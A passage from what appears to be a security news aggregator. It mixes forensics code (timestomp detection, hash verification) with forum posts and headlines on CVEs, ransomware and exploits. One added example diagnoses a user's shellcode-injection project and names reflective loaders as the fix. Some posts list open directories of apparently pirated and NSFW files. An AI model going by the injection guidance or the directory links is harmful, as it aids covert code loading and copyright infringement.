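        if r["si_accessed"] - current[-1]["si_accessed"] <= window_secs * TICKS_PER_SEC:
            current.append(r)
        else:
            clusters.append(current)
            current = [r]
    clusters.append(current)
    return [[r["name"] for r in c] for c in clusters if len(c) > 1]


# Constructed sample: report.docx has been backdated; three files share a
# last-access burst on 2022-03-10 consistent with one bulk copy.
SAMPLE = [
    rec("report.docx", "2020-01-05 10:00:00", "2020-01-05 10:00:00",
        "2022-03-10 08:00:01.250000", "2022-03-01 09:12:33.123456"),
    rec("notes.txt", "2022-03-01 09:12:33.123456", "2022-03-04 17:45:10.009876",
        "2022-03-10 08:00:02.100000", "2022-03-01 09:12:33.123456"),
    rec("budget.xlsx", "2022-02-20 11:30:45.500000", "2022-03-05 12:00:00.333333",
        "2022-03-10 08:00:03.900000", "2022-02-20 11:30:45.500000"),
    rec("old.log", "2021-06-01 00:00:00.700000", "2021-06-01 00:00:00.700000",
        "2021-07-15 16:20:00.123000", "2021-06-01 00:00:00.700000"),
]

if __name__ == "__main__":
    for r in SAMPLE:
        print(r["name"], timestomp_indicators(r) or "no indicators")
    print("last-access clusters:", access_clusters(SAMPLE))
```

    Both heuristics have false positives (files restored from FAT media or some archive formats carry whole-second times, and a legitimate backup restore produces an access burst), so corroborate with the $UsnJrnl and $LogFile entries for the same MFT records before calling it tampering.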
    Generate Linux Volatility Profile with the help of VMware vSphere, without running anything on the guest machine
    As you know, to generate a Linux Volatility profile or symbols (for Volatility 3), especially if it's a custom kernel, you need to run something on the target machine, such as compiling something using make. But sometimes that is not possible, for example if make/gcc are not available to compile. But if the Linux machine is a vSphere VM, is there any way to use vSphere to generate the profile/symbols required for Volatility, without running anything in the Linux VM? I know that dumping memory is possible, but what about generating a profile/symbols? submitted by /u/Ro0o0otkit [link] [comments]
  • Open

    CVE-2022-41853: Potential Remote Code Execution Vulnerability in Hsqldb
    Article URL: https://www.code-intelligence.com/blog/potential-remote-code-execution-in-hsqldb Comments URL: https://news.ycombinator.com/item?id=33264105 Points: 2 # Comments: 0
    CVE-2022-42889 Explotation, Detection and Mitigation
    Article URL: https://sysdig.com/blog/cve-2022-42889-text4shell/ Comments URL: https://news.ycombinator.com/item?id=33263998 Points: 3 # Comments: 0
  • Open

    SecWiki News 2022-10-19 Review
    Code audit / web penetration SRC material bundle (add WeChat ms08076 for the extraction code) by shuteer; Some common threat intelligence analysis platforms by shuteer; [Security Training Ground] | BurpSuite lab series: authentication by shuteer; 2020 Meiya Cup individual competition review by ourren; For more of the latest articles, visit SecWiki
  • Open

    Challenge Crypto Osint Histoire
    Continue reading on Medium »
    Hello sir, your child got arrested doing drugs…!!
    This is how most people are falling prey to scams of mafia groups that make you believe that your child was arrested for doing drugs. When… Continue reading on Medium »
  • Open

    Four Steps to Prepare for a Ransomware Attack
    No content preview
    Reverse Engineering Function Call in C and Exploiting it
    Binary Exploitation of a Simple Function in C Continue reading on InfoSec Write-ups »
  • Open

    Writing Ransomware for VMWare ESXi
    I wanted to find some ransomware samples for VMware ESXi. I didn't find any, so I decided to write my own. I was shocked at how ridiculously easy this was. I made a video showing how to do this in 33 lines of python. Hopefully, this will help further detection of these kinds of threats. Check it out! Writing Ransomware for ESXi submitted by /u/Infosecsamurai [link] [comments]
    Microsoft Office Online Server Remote Code Execution
    submitted by /u/gid0rah [link] [comments]
  • Open

    Hands-on target practice: Noter
    The box starts with information gathering; it turns out to be built on Flask, so flask-unsign is used to decode and brute-force the session cookie.
    A beginner learns zero trust
    As internal network attack threats keep growing, attacks that blur the perimeter and steal trust keep emerging.
    FreeBuf Morning Report | Germany's cybersecurity chief fired over alleged Russia ties; Kakao CEO announces resignation
    Germany's interior minister dismissed cybersecurity chief Arne Schönbohm, who faces allegations of links to Russian security services through the industry association Cyber Security Council Germany.
    Who will take Innovative Security Product of the Year | The WitAwards 2022 China Cybersecurity Industry Awards are underway
    Get clicking and help your favourite innovative cybersecurity product make its debut.
    Top 10 most-used tools among white hats worldwide in 2022
    Over the decades, the tools used by attackers, white hats and security practitioners have kept evolving, becoming the most technically distinctive beacons along the long river of cybersecurity.
    Applying for US student loan forgiveness? Beware of falling into online scammers' traps
    The US student loan forgiveness program officially opened for free applications on October 17, and more than 8 million people have already submitted applications.
    31 suspects arrested in Europe for stealing cars with keyless entry hacking techniques
    31 people were arrested in Europe for stealing cars using keyless entry hacking techniques.
  • Open

    What plugins do you recommend for ExploitDev or RE and why?
    Which plugins make life easier for you? For Windbg , IDA pro , Ghidra and ... submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Are the DVWA 'impossible' levels possible to crack?
    I've been trying to crack the File Upload section on impossible difficulty and, well, it seems impossible. I cannot find a solution anywhere, and I'm not asking for a solution here, I just want to know if it's possible or not. Thanks! submitted by /u/simplyheinz [link] [comments]
    Why is SANS Technology Institute or sans.edu not recognized by usnews.com.
    Why is SANS Technology Institute or sans.edu not recognized by usnews.com? This question is killing me and I can't find an answer. I am looking into applying for a master's degree. submitted by /u/Sufficient-Gap-8480 [link] [comments]
  • Open

    CVE-2022-26138 Confluence Server hard-coded credentials vulnerability analysis
    Author: xxhzz@星阑科技PortalLab Original link: https://mp.weixin.qq.com/s/HRqWtQh1q1R--NDIlHLCMA Vulnerability description: On July 21, Atlassian released its July 2022 security updates, which cover multiple Confluence Server vulnerabilities; among them, CVE-2022-26138 is a hard-coded credentials vulnerability. When Confluence Server or Data Cen...
  • Open

    Data Collection
    During IR engagements, like many other analysts, I've seen different means of data exfiltration. During one engagement, the customer stated that they'd "...shut off all of our FTP servers...", but apparently "all" meant something different to them, because the threat actor found an FTP server that hadn't been shut off and used it to first transfer files out of the infrastructure to that server, and then from the server to another location. This approach may have been taken due to the threat actor discovering some modicum of monitoring going on within the infrastructure, and possibly being aware that FTP traffic going to a known IP address would not be flagged as suspicious or malicious. During another incident, we saw the threat actor archive collected files and move them to an Internet-ac…

  • Open

    Decentralized, private and anonymous comms tech
    I know of some apps/systems that enable/support 1 or 2 of the 3 requirements but NOT ALL 3: Decentralized: no central authority nor central servers are needed to support the operation. It's totally distributed. Private: the content shared on this platform is encrypted. Anonymous: from the outside, it's impossible to know who's sending messages to whom. I've also read theses about systems like this but I couldn't find any LIVE system that ticks all these 3 boxes. Ideas? Suggestions? Thank you submitted by /u/iambrunocoelho [link] [comments]
    Defenders beware: A case for post-ransomware investigations
    submitted by /u/SCI_Rusher [link] [comments]
    New to cybersecurity
    I want to become a pentester. I’ve done a ton of research in regards to certification and ctf’s before posting on here. I do not want to get a degree in computer science so please any info to a noob would be greatly appreciated that would be an alternative route/path to be able to get a job. Give me your opinion on how I should get started. I’m wiping an old laptop I have to use for Linux and practice coding but I know nothing of Linux or anything else to this regard. Treat me like you would someone who knows nothing about cybersecurity. Thank you. submitted by /u/WHATTHEPHOBIA [link] [comments]
  • Open

    Jetstack Paranoia: A New Open Source Tool for Container Image Security
    submitted by /u/sanitybit [link] [comments]
    Enrich Splunk events with Steampipe
    submitted by /u/sanitybit [link] [comments]
    Our new scanner for Text4Shell
    submitted by /u/dn3t [link] [comments]
    Introducing fine-grained personal access tokens for GitHub
    submitted by /u/0x414141 [link] [comments]
    Opening the doors and windows 0-click RCE on the Tesla Model3
    submitted by /u/jeandrew [link] [comments]
    CVE-2022-42889 (Text4Shell) OSS detector - Finds possibly vulnerable JAR files
    submitted by /u/SRMish3 [link] [comments]
    A Detailed Analysis of the Gafgyt Malware Targeting IoT Devices [PDF]
    submitted by /u/CyberMasterV [link] [comments]
    Recovering Web Tokens From Office
    submitted by /u/gid0rah [link] [comments]
  • Open

    Users Without Permission Can Download Restricted Files
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/794904 - Bounty: $500
    Sub-Dept User Can Add User's To Main Department.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/890209 - Bounty: $500
    Access to private file's of helpdesk.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/804534 - Bounty: $500
    TikTok Account Creation Date Information Disclosure
    TikTok disclosed a bug submitted by f15: https://hackerone.com/reports/1562020 - Bounty: $100
    CVE-2017-5929: Hyperledger - Arbitrary Deserialization of Untrusted Data
    Hyperledger disclosed a bug submitted by mik-patient: https://hackerone.com/reports/1739099
    XSS in www.shopify.com/markets?utm_source=
    Shopify disclosed a bug submitted by noblesix: https://hackerone.com/reports/1699762 - Bounty: $500
  • Open

    Return HackTheBox Walkthrough
    Return is a Windows machine on HTB and is rated as easy, this box is designed over windows that have Weak Service Permission. If summarized, The post Return HackTheBox Walkthrough appeared first on Hacking Articles.
  • Open

    What is the UK going rate for cybersecurity professionals?
    Hi I remember someone posting the average UK salaries that cybersecurity professionals earn I think back in 2021. Just curious to know what the going rates are in the UK for security engineers and analysts that have up to 3 years experience Thanks submitted by /u/securm0n [link] [comments]
    Scheduled or Random Internal Penetration Tests?
    In my current environment, I get random alerts of a brute force happening on a ton of my networking equipment. The IT SecOps team has previously mentioned that they moved from a scheduled model to a random model to better simulate an actual penetration and/or attack. My concern with this is that now I know significantly less about what is them performing a test, and what is an actual threat trying to break into the equipment. Is there an expected level of transparency, or am I meant to be in the dark about when these are happening? How can I best distinguish a test from an actual attacker? submitted by /u/MikeDeansMustard [link] [comments]
    Hardware fingerprinting capabilities of Electron apps?
    We know that web browsers can fingerprint individual hardware by noticing imperfections with the aid of WebGL, Canvas, etc. Given that an Electron app is Chromium under the hood, could it do the same? Or inject something like fb.com/fp.js on the page? Are there any controls which could affect these capabilities? E.g. command line parameters, MAC restrictions and CSP settings? And as a side question, could fingerprinting be affected by restricting the app's access to /sys/ with a MAC? Or is it solely in the hands of the graphics driver? submitted by /u/nobodysu [link] [comments]
    Breaking in to Cybersec industry
    Does anyone have any insights on breaking into Cyber? I'm a new grad with B.S. in Cybersecurity and am currently studying for Security+, and AWS Practitioner Certs - also freshening up on python and SQL. Any and all comments are appreciated! submitted by /u/EatsButtALOT [link] [comments]
  • Open

    time lapse videos of construction
    https://157.158.62.96/ submitted by /u/dasheswithdots [link] [comments]
    Some classical music. Beethoven, Chopen, Pachelbel's canon in D
    http://104.236.12.144/audio/ Since this collection contains Pachelbel's canon in d, I have to post this video. submitted by /u/HGMIV926 [link] [comments]
    Random search...
    Small xxx clips http://www.indiepornrevolution.com/indie-porn/wp-content/uploads/html5encodes/ Images http://www.thisisrnb.com/wp-content/gallery/ Found this searching for VOD. some mp4... https://media.assembly.org/vod/ Posted this on the other side... Some funny stuff... https://elsmar.com/pdf_files/ Strange vids & pics bit like the site S*** J***... https://www.2raw4tv.com/video/picture/?C=S;O=D 5 links... submitted by /u/xanderTgreat [link] [comments]
    [NSFW] Movies, TV Shows, eBooks, Recipes
    https://cosconor.fr/ - Radio/GSM Docs, Drivers, Wallpapers (anyone need a wallpaper for their blackberry?), etc. http://36.92.42.3:8282/ - eBooks, Android apps, Software, Drivers (Custom OD for some Tech company) http://genesfinefoods.net/recipes/ - Recipes http://www.thepollacks.com/recipes/ - Recipes http://www.deanricci.com/recipes/ - Recipes https://health.mbolli.ch/ - Health videos/documents/propaganda http://www.nude-muse.com/Free/ - NSFW videos/pictures http://bozek.cz/shanachan.org/ - NSFW (NSFL?) http://costartech.com/pb/Vehicle%20Info/ - Manuals For Replacing the CIM in various makes/models of vehicles https://joelixny.soupwhale.com/lalila/ - The Office (US) S09 http://www.ashleecadell.com/x-andi-xyz/ - Music & TV Shows http://54.36.106.156/ - Movies & TV Shows http://54.37.190.125/ - Movies, TV Shows, Anime, PC Games, Tech eBooks (FR/EN) https://icepug.xyz/ - Movies, TV Shows, Software http://www.wolonger.com/ - NSFW Movies, TV Shows, Software, OS ISOs https://federicogorla.site/downloads/ - TV Shows http://208.58.215.222/ - Small collection of Movies & a TV Show http://144.76.201.109/ - TV Show (FR), OpenVPN w/ a profile, etc. http://136.243.36.36/cartoons/ - Small collection of cartoons http://open.crowbar.lt/ - TV Shows, Black Mesa, Audio/Video from Babcon 1995 http://193.32.23.167/ - PLA Media Pack, Prank Phone Calls submitted by /u/JasonSec [link] [comments]
    Movies, music, anime, concerts, eBooks, and more
    http://113.14.80.134:9002/ => Mostly anime (chinese subs), BGM https://128.93.166.14/ => Press articles, conferences/talks, radio podcasts, interviews and various other things (various languages) http://193.55.211.36:8081/ => Looks like radio rips, mostly music but there's also podcasts (French) http://193.49.213.142/ => Pharo programming language tutorials (pdf and videos) in multiple languages (mostly english and french) http://89.91.159.6:8080/ => Movies, series, anime (French) http://93.115.96.215/ => Series and movies (French) http://92.131.197.89:8000/ => Music, movies, anime, series http://90.127.218.242:8000 => Movies, seems low quality (French subs) http://90.120.236.174:81/ => Loads of movies, series, cartoons, and other videos http://90.102.25.202/ => Loads of house plans http://90.55.90.149/ => Music sheets, various music http://90.46.114.89/Musiques/ => Loads of triaged musics http://90.23.56.118/Video/ => Concerts, movies, cartoons (mostly French apart from the concerts) http://86.247.124.74/FTP_Upload/TEM/ => French movies and series http://82.121.68.193/ => Movies, TV Shows, mostly multi dub but some french-only http://81.250.211.110/ => Looks like radio rips submitted by /u/MasterIO02 [link] [comments]
  • Open

    SHELLCODE with python HELP!
    Hello learned people, Intent: I am writing a practice project where the intent is to take a base64 encoded text, decode that, and execute it within the current process memory. Please note the Base64 text is the direct encoding of an exe file. Problem: after decoding it's giving my result in bytes, which is perfect. When pushing that as shellcode to OpenProcess, WriteProcessMemory, CreateRemoteThread, error-code-wise everything works fine but nothing happens. But for the same file, a donut-converted shellcode is working as intended. Testing: For testing purposes, I printed out the bytes returned by both my function and Donut-Shellcode's and compared them online. Says there's no difference. I tested with Type(), Len() and everything is the same. So Question: Why is my version of bytes not working and Donut's is if there's no visible difference? And what can I do about it? Thanks. https://preview.redd.it/pl7vmcwwqlu91.png?width=984&format=png&auto=webp&s=1f31282e89ade0a273fd898ec8541d42c45d283b submitted by /u/C0DEV3IL [link] [comments]
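An added example, not from the post, that shows why the two byte strings behave differently even when they look alike: base64-decoding an .exe gives back a PE file image, and a PE image is not position-independent code. A thread started at offset 0 executes the DOS header ("MZ" happens to decode as a harmless instruction on x86 and x64, which is why there is no immediate crash, but what follows is header data, not code), while the real entry point is an RVA that only means something after the sections are mapped at their virtual addresses, the imports resolved and the relocations applied. Donut's output differs because it wraps the PE in a loader stub that does that work inside the target process; the raw decoded bytes carry no such stub. The parser below, written for this page, reads the DOS, COFF and optional headers and reports what a loader would still have to do. The minimal PE32+ header it builds is constructed for the demo and is not a runnable executable.

```python
import struct

MACHINES = {0x14C: "x86", 0x8664: "x64", 0xAA64: "arm64"}
DIR_IMPORT, DIR_BASERELOC = 1, 5        # data-directory indices

def build_sample_pe64():
    """Constructed, minimal PE32+ header: DOS header, 'PE\\0\\0', COFF header,
    optional header and one section header. Not a runnable executable; it only
    has enough structure for inspect_blob() to read."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                     # PE32+ magic
    struct.pack_into("<I", opt, 16, 0x1000)                   # AddressOfEntryPoint (RVA)
    struct.pack_into("<Q", opt, 24, 0x140000000)              # ImageBase
    struct.pack_into("<I", opt, 56, 0x4000)                   # SizeOfImage
    struct.pack_into("<I", opt, 108, 16)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * DIR_IMPORT, 0x2000, 40)
    struct.pack_into("<II", opt, 112 + 8 * DIR_BASERELOC, 0x3000, 12)
    sect = b".text\0\0\0" + struct.pack("<IIIIIIHHI", 0x200, 0x1000, 0x200, 0x400,
                                          0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect

def inspect_blob(blob):
    """Tell a PE file image apart from position-independent code.
    kind == 'pe' means the bytes are an on-disk image that still needs loading."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return {"kind": "raw", "size": len(blob)}
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 24 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"kind": "raw", "size": len(blob)}   # 'MZ' but no PE header: treat as code
    machine, nsect, _, _, _, _, chars = struct.unpack_from("<HHIIIHH", blob, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", blob, opt)[0]
    if magic == 0x20B:                                        # PE32+
        image_base = struct.unpack_from("<Q", blob, opt + 24)[0]
        ndirs_off, dirs_off = opt + 108, opt + 112
    elif magic == 0x10B:                                      # PE32
        image_base = struct.unpack_from("<I", blob, opt + 28)[0]
        ndirs_off, dirs_off = opt + 92, opt + 96
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    entry = struct.unpack_from("<I", blob, opt + 16)[0]
    ndirs = struct.unpack_from("<I", blob, ndirs_off)[0]

    def directory(i):
        return struct.unpack_from("<II", blob, dirs_off + 8 * i) if i < ndirs else (0, 0)

    return {"kind": "pe", "arch": MACHINES.get(machine, hex(machine)),
            "dll": bool(chars & 0x2000), "entry_rva": entry, "image_base": image_base,
            "sections": nsect, "has_imports": directory(DIR_IMPORT)[0] != 0,
            "has_relocs": directory(DIR_BASERELOC)[0] != 0}

def verdict(info):
    """What CreateRemoteThread(start = first byte of blob) actually does with it."""
    if info["kind"] == "raw":
        return "no PE header: the thread runs byte 0 as code, as expected for shellcode"
    work = ["map sections at their RVAs"]
    if info["has_imports"]:
        work.append("resolve imports")
    if info["has_relocs"]:
        work.append("apply relocations unless loaded at 0x%x" % info["image_base"])
    return ("%s %s image; a thread started at offset 0 executes the DOS header, not the "
            "entry point (RVA 0x%x). A loader must first: %s."
            % (info["arch"], "DLL" if info["dll"] else "EXE", info["entry_rva"], ", ".join(work)))

if __name__ == "__main__":
    for name, blob in [("decoded exe", build_sample_pe64()), ("shellcode", b"\x48\x31\xc0\xc3")]:
        print(f"{name}: {verdict(inspect_blob(blob))}")
```

Run the checker on the decoded bytes before injecting them: if it reports a PE image, the fix is a loader (Donut, sRDI or a reflective loader you write yourself), not a different way of decoding the base64.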
  • Open

    FTK Imager Access denied
    Hey all, I am a SysAdmin NASA contractor who dabbles in security and forensics, mostly with SIFT, but 3 weeks ago I started a PI firm, and was given a tip to check out FTK. Filling out the form to download the Imager and Captcha leads me to an Access Denied on FF, Chrome, Brave etc. AccessDeniedAccess DeniedCXP9ZN6X6H667CA0UEHZG4CP+qTHWnRBl1jvaymHkysPEYaSTI+L2JVHHSucJshBUMu58ChzaXSWCefiftT6l8872Dc= Also, does anyone have any info on what a single FTK license costs? Appreciate it guys. submitted by /u/Responsible_Invite73 [link] [comments]
    Career Path
    So, essentially I need a bit of guidance on what type of career path fits what I am interested in. I have always been really good at sleuthing around on the internet (albeit using the most basic tools available..). Example: my best friend gave me the name of a guy who asked her on a date and within minutes I had found he had a wife, a baby, an attempted murder charge, among many others. Just a small example. Anyways, I have always genuinely enjoyed investigative type stuff, and recently after many years of being pretty aimless on an actual career I came to the realisation I’d like to pursue something where I could use those basic skills and learn more and develop an actual career. Any guidance would be super appreciated! submitted by /u/Altruistic-Blueberry [link] [comments]
    DF Police Jobs (UK)
    Hey guys, Does anyone have any idea how long can application screening take when applying for DF jobs within a police department (UK)? I assume it varies but are we talking days or potentially weeks? I’m a graduate applying for a junior role. submitted by /u/True-Housing-7515 [link] [comments]
    SANS GCFE
    Has anyone taken the GCFE exam recently ? I’m taking it in November, wanted to check if the exam has labs or is it just MCQs ? submitted by /u/x_r2 [link] [comments]
  • Open

    SecWiki News 2022-10-18 Review
    Getting started with enterprise security building by ourren; Internet of Vehicles security basics: making a USB SPH2.0 wiring harness by ourren; For more of the latest articles, visit SecWiki
  • Open

    The Embassy Collection: the story behind our new NFT
    What is the first thing you think of when you look at a hat? Is it the colour? The style? The comfort? Maybe how good it makes you feel when… Continue reading on Medium »
    What is JWT (JSON Web Token) ? Authorization Tokens (Part 2)
    The story starts with a problem. The problem that occurs with Session Tokens. We discussed in Part 1. Give that a 4 minute read before… Continue reading on System Weakness »
    WordPress Subdomain Takeover on Bugcrowd Private Program
    Hello guys👋👋, Prajit here from the BUG XS Team, recently I got a valid WordPress Subdomain Takeover on a Bugcrowd private program, in… Continue reading on Medium »
    What is Session ID / Session Token ? Authorization Tokens (Part 1) (WebApp Pentesting)
    SYNOPSIS : HTTP & it’s behaviour Continue reading on System Weakness »
    Pushing Burpsuite cert to system store in Android(rooted)
    Having your burpsuite ca certificate pushed to system store provides you greater advantage in your testing. certificates in system store… Continue reading on Medium »
    Exploitation of misconfigured Amazon aws s3 buckets
    Yo! Continue reading on Medium »
    Bug Bounty: Google Maps API key leaked on reconnaissance.
    Hi folks, this article is about how I discovered a leaked google map API key on public facing web application during a bug bounty program. Continue reading on Medium »
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 1)
    I’ll try to show you how to build an exploit from scratch and its advantages. Continue reading on InfoSec Write-ups »
    Everything about Session Puzzling and Hijacking
    A decade or two from now, no one would have anticipated that web apps might become such engaging, fancy user roles or dynamic material to… Continue reading on CodeX »
  • Open

    Competing for Security Brand Influence of the Year | The WitAwards 2022 China Cybersecurity Industry Awards are underway
    Come see whether the companies you support made the list; every vote helps your favourite brand make its debut.
    FreeBuf Morning Report | Hashcat can crack eight-character passwords in 60 minutes; Lazarus on a cryptocurrency theft spree
    A core developer of the password-cracking tool Hashcat says an array of eight RTX 4090 cards can crack an eight-character password within 60 minutes.
    "Keys to the kingdom" at risk: single sign-on (SSO) credentials are being exposed at an accelerating rate
    Single sign-on (SSO) credentials are regarded by security professionals as the "keys to the kingdom": employees log in once with them and gain access to many applications.
    A defence plan against WeChat social engineering attacks
    A defence plan against WeChat social engineering attacks, no high tech or gimmicks required.
    Australian retail giant leaks data on 2.2 million users, now being sold online by hackers
    Australian retail giant Woolworths disclosed a recent data breach at its subsidiary MyDeal affecting 2.2 million users.
    Russia launches cyberattacks against Bulgaria
    The infrastructure of Bulgarian government agencies was hit by large-scale DDoS attacks, with the Ministry of Interior, Ministry of Defence, Ministry of Justice, Constitutional Court and other government departments seriously affected.
    Voting opens for the WitAwards 2022 China Cybersecurity Industry Awards: pick your No. 1
    Everyone is welcome to vote; help your favourite company make its debut.
  • Open

    Dameware Mini: The Sleeper Hit of 2019?
    SolarWinds! You hear the name and immediately think “solutions management” or big screens full of more network information than you can shake a stick at. SolarWinds has been on the scene since 1999, and their products and solutions can be found in networks worldwide. SolarWinds Dameware Mini Remote Control is one such offering. On the... The post Dameware Mini: The Sleeper Hit of 2019? appeared first on TrustedSec.
  • Open

    Hacking into a modern Linux distribution
    3 methods to gain access to the Linux filesystem Continue reading on InfoSec Write-ups »
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 1)
    I’ll try to show you how to build an exploit from scratch and its advantages. Continue reading on InfoSec Write-ups »
    XML External Entities
    No content preview
  • Open

    “October Mentoring Fest”
    ISO 27001 AND 27002 Continue reading on Medium »
    Open Source Intelligence Market Analysis, Growth Impact and Demand By Regions Till 2030
    Market Overview Continue reading on Medium »
    Are We All Spies?
    Open-source intelligence, OSINT for short, is data gathered from publicly available, free and open-source tools that produce information… Continue reading on Sanction Scanner Türkiye »
    Data Visualisation and Analysis for Cybercrime Investigation
    The National Cyber and Crypto Agency (BSSN) says more than 700 million cyberattacks occurred in Indonesia in 2022. Cyberattacks that… Continue reading on Medium »
  • Open

    CVE-2021-34866 Linux kernel privilege escalation vulnerability analysis
    Author: b1cc@墨云科技VLab Team Original link: https://mp.weixin.qq.com/s/w0HYPpdMxhcPvKvtSJf_CQ On October 12, 2021, the Japanese security vendor Flatt Security disclosed the Linux kernel privilege escalation vulnerability CVE-2021-34866. On November 5, @HexRabbit published an exploitation method for this vulnerability on GitHub together with a write-up that is technically excellent and concisely written. ...
  • Open

    Persistence on a windows machine using “winrm” (no creds needed)
    Step 1: Continue reading on Medium »

  • Open

    extrnode: how we plan to fix the main vulnerability of the RPC layer in Web3
    Article URL: https://mirror.xyz/extrnode.eth/7bgVDpJP4_1FNWYBfX_OzFaOtK39oDuFOxQxmxdCaQQ Comments URL: https://news.ycombinator.com/item?id=33241223 Points: 2 # Comments: 1
    Java Apache Commons Text vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-42889 Comments URL: https://news.ycombinator.com/item?id=33230603 Points: 110 # Comments: 34
  • Open

    Website blacklisted. Is the website person or IT person to blame?
    Our website person says our IT person is to blame for a blacklist, and our IT person says our website person is to blame. Here's what I know: We went two weeks with some outbound and some inbound emails not being delivered. Once I realized the issue, I was told the website had been blacklisted by Barracuda. Who do I need to address to remedy this, and how come neither the IT person nor the website person was notified of this issue when the blacklist first occurred? Relevant screenshots with domain redacted: https://ibb.co/nszTC38 https://ibb.co/f14yzCj I apologize if I sound ignorant. Thank you for any help! submitted by /u/Scout_It_Down [link] [comments]
    Are there any PDF specific YARA rules you know of that are not collected in The Pdfalyzer repo yet?
    If so, please post them here; trying to scrounge up everything I can. The Pdfalyzer (PyPi) Direct link to the folder with 3 .yara files compiling a bunch of YARA rule sources. Looking for anything not represented here, or even ideas for such. submitted by /u/thenextsymbol [link] [comments]
    From an IT security perspective, why is WFH seen as riskier than working in-office?
    From an IT security perspective, why is WFH seen as riskier than working in-office? Yes, I can ask my colleagues sitting beside me about a potentially dodgy email. But aside from that, with most apps and data now being in the Cloud anyway, why is working from home seen as riskier? submitted by /u/baghdadcafe [link] [comments]
  • Open

    verify file integrity in autopsy
    Hello everyone. I am trying to find file authenticity in a disk image using Autopsy in Kali in a virtual machine. How can I check MD5 values' integrity? I've already found the MD5 values but I can't understand how I can verify them. I'm studying cyber security and this is a part of my assignment; any help is appreciated. submitted by /u/arbituas [link] [comments]
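For the Autopsy assignment above, the per-file hashes Autopsy shows are only useful once compared against something: Autopsy's Hash Lookup ingest module matches them against hash sets (NSRL known-good, known-bad lists), and its Data Source Integrity ingest module recomputes the hash stored inside an E01 container to prove the image itself is intact. If what you were given is a list of expected MD5 values for exported files, verification is just recomputing and comparing. The following is an added example, not from the post: an md5sum-style hash list verifier in Python that reports ok / MISMATCH / MISSING / UNLISTED for an exported directory tree. The files, contents and hash list it builds under a temporary directory are constructed for the demo.

```python
import hashlib
import tempfile
from pathlib import Path

CHUNK = 1 << 20

def hash_file(path, algo="md5"):
    """Stream the file in 1 MiB chunks so large exports never sit in memory whole."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()

def parse_hash_list(text):
    """md5sum/sha256sum style lines: '<hex>  <path>' or '<hex> *<path>' (binary mode).
    Returns {relative path: lowercase hex digest}."""
    expected = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition("  ")
        if not name:                       # single-space / binary-mode variant
            digest, _, name = line.partition(" ")
        expected[name.lstrip("*").strip()] = digest.lower()
    return expected

def verify_tree(root, expected, algo="md5"):
    """Compare every listed file under `root` with its expected digest.
    Returns {relative path: 'ok' | 'MISMATCH' | 'MISSING' | 'UNLISTED'}."""
    root = Path(root)
    result = {}
    for rel, want in expected.items():
        p = root / rel
        if not p.is_file():
            result[rel] = "MISSING"
        else:
            result[rel] = "ok" if hash_file(p, algo) == want else "MISMATCH"
    for p in root.rglob("*"):              # files present but absent from the list
        if p.is_file():
            result.setdefault(p.relative_to(root).as_posix(), "UNLISTED")
    return result

def demo():
    """Constructed scenario: export three files and record their MD5s, then alter
    one file, list a file that never existed, and drop in a stray extra file."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "docs").mkdir()
        files = {"docs/a.txt": b"alpha\n", "docs/b.txt": b"bravo\n", "c.bin": bytes(range(256))}
        for rel, data in files.items():
            (root / rel).write_bytes(data)
        listing = "\n".join("%s  %s" % (hash_file(root / rel), rel) for rel in files)
        listing += "\nd41d8cd98f00b204e9800998ecf8427e  gone.txt"   # listed, not present
        (root / "docs" / "b.txt").write_bytes(b"bravo!\n")          # modified after hashing
        (root / "extra.log").write_bytes(b"not in the list\n")
        return verify_tree(root, parse_hash_list(listing))

if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(f"{status:9s} {path}")
```

Pass `algo="sha256"` when the list was made with sha256sum; MD5 is fine for matching against a list you were handed, but for any hash you will have to defend later, record SHA-256 alongside it.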
    People that still uses Guidance Tableau TD2 and TD3
    Is it faster if the destination port was plugged into a USB 3.0 or m.2 SSD enclosure? Any tips or tricks to speed up the imaging process? submitted by /u/hw60068n [link] [comments]
    Admissibility of write-blocking devices
    I was once informed that the legal system in some countries deemed the use of a write-blocking device as inadmissible in court. In a field where the main goal is not only to investigate an offense but also to preserve the integrity of the data examiners are analyzing, this all seems a bit illogical. I'm pretty sure that write-blocking devices is a must these days whenever a computer forensic investigation is conducted. Is there any reason for judges to not trust the reliability of the device, or are they just too narrow-minded for their own good? submitted by /u/jjThomson69 [link] [comments]
    Volatility - powershell history
    Quick Volatility question over here. Is it possible to recover previously typed PowerShell commands? All the documentation I read talks about recovering cmd.exe. I've tried the cmdscan and consoles plugins. Even tried memdump with the process specified, but I'm not sure how to start making sense of that output. Any insight would be appreciated. submitted by /u/HelpBeginning4777 [link] [comments]
